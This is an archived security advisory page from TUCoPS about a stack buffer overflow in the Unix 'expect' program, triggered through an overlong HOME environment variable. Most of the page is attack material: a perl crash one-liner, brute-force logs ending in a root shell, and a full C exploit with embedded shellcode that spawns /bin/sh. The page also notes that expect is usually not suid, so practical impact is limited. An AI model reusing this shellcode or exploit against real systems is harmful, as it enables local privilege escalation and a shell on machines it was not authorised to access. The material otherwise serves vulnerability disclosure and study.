TUCoPS :: Unix :: General :: expect.htm

Expect overflow
Vulnerability

    expect

Affected

    various

Description

    Kevin Finisterre posted  following.  He  found an overflow  in and
    coded the exploit code for several versions of  /usr/bin/expect...
    on SCO,  linux, and  BSD variants.   We are  unable to  think of a
    situation where this would be  useful due to the fact  that expect
    is not suid... except on Cray.

        [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
        [root@linux elguapo]# expect
        Segmentation fault (core dumped)

    //krfinisterre@checkfree.com or dotslash@snosoft.com
    //this is output from my brute script...
    //722
    //Stack pointer: 0xbffffa18
    //       Offset: 0x2d3
    //  Return addr: 0xbffff745
    //stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
    $3
    $L
    //723
    //Stack pointer: 0xbffffa18
    //       Offset: 0x2d4
    //  Return addr: 0xbffff744
    //sh-2.04#
    //note that I was root when I ran this ... expect is not suid
    
    #define BUFFERSIZE 533
    
    unsigned long sp(void)
    {
            __asm__("movl %esp, %eax");
    }
    
    int main(int argc,char **argv)
    {
      char hell[] =
            "\x29\xc0"
            "\x29\xc0"
            "\xb0\x47"
            "\x29\xdb"
            "\xb3\x0c"
            "\x89\xd9"
            "\xcd\x80"
            "\x5e"
            "\x29\xc0"
            "\x88\x46\x07"
            "\x89\x46\x0c"
            "\x89\x76\x08"
            "\xb0\x0b"
            "\x87\xf3"
            "\x8d\x4b\x08"
            "\x8d\x53\x0c"
            "\xcd\x80"
            "\xe8\xe3\xff\xff\xff"
            "\x2f\x62\x69\x6e\x2f\x73\x68";
            int i;
            int offset;
            long esp;
            long ret;
            long *addr_ptr;
            char *buffer, *ptr;
            offset = atoi(argv[1]);
            esp = sp();
            ret = esp-offset;
    
            if(!(buffer = malloc(BUFFERSIZE)))
            {
                    printf("oops\n");
                    exit(-1);
            }
    
            ptr = buffer;
            addr_ptr = (long *)ptr;
            for (i=0; i<BUFFERSIZE; i+=4)
                    *(addr_ptr++) = ret;
    
            for (i=0; i<BUFFERSIZE/2; i++)
                    buffer[i] = '\xeb02';
    
            ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
            for(i=0; i<strlen(hell); i++)
                    *(ptr++) = hell[i];
    
            buffer[BUFFERSIZE-1] = 0;
    
            setenv("HOME", buffer, 1);
            execlp("/usr/bin/expect", 0);
    }

Solution

    Nothing... Just keep Your expect non suid.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH